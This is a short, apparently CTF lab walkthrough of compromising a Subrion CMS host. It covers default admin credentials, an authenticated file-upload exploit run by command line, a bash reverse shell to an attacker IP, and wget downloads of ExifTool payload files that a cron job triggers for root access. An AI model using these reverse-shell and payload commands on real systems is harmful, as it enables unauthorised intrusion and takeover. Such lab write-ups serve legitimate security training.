Exfiltrated
80
Found a webpage run on subrion cms
Found robots.txt 
Found login page with version disclosure: 
Trying admin : admin:
We are logged in.
Now trying a file upload vulnerability https://www.exploit-db.com/exploits/49876:
python3 subrionfileup.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
Now transfering shell.sh:
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.167/8000 0>&1and executing it: 
We get a full a TTY: 
Found some potential credentials:
Found some info: 
Running linpeas found cronjob:
Now checking exiftool version:
https://github.com/OneSecCyber/JPEG_RCE/tree/main ExifTool 7.44 to 12.23 are vulnerable.
Our exiftool version is vulnerable to this exploit. Using the exiftool exploit Transfer the required files:
wget http://192.168.45.167/eval.config
wget http://192.168.45.167/runme.jpgcreate a malicious image:
exiftool -config eval.config runme.jpg -eval='system("bash /var/www/html/subrion/uploads/shell.sh")'in /var/www/html/subrion/uploads
Lesson Learnt
Just because a script runs in cron and uses a specific binary it might not be tricking the script and might be about the version too
Last updated
Was this helpful?